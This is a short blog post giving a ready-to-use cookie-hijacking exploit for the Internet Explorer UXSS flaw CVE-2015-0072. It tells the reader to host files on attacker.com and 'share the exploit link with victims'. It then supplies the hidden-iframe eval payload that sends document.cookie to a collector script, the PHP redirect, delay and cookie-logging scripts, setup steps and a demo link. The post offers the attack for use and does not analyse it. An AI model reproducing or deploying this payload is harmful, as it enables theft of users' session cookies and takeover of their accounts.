2015 m. vasario 10 d., antradienis

Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072)

Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072)

Host below files on webserver (attacker.com) and share the exploit link with victims,

exploit.php --- exploit link (Share with victim)

redirect.php --- Script to redirect on target page (target page should not contain X-Frame-Options or it will fail)

delay.php --- Script to add delay

collector.php --- Script to collect hijacked cookie

log.txt --- Collected cookies will be stored in this text file

<iframe src="redirect.php" style="display:none"></iframe>
<iframe src="https://target.com/" style="display:none"></iframe>
    top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","http://attacker.com/delay.php",false),send();_.location="javascript:bkp=\'http://attacker.com/collector.php?\'+document.cookie;alert(bkp);window.location(bkp);"');

header("Location: https://target.com/");

echo 'Bhdresh';

$f = fopen("log.txt", 'a');
fwrite($f, $_SERVER["REQUEST_URI"]."\n");
header("Location: http://www.youtube.com/");


- Create a file as log.txt and modify the permissions (chmod 777 log.txt)
Demo: facabook.net16.net/exploit.php
Reference: http://innerht.ml/blog/ie-uxss.html

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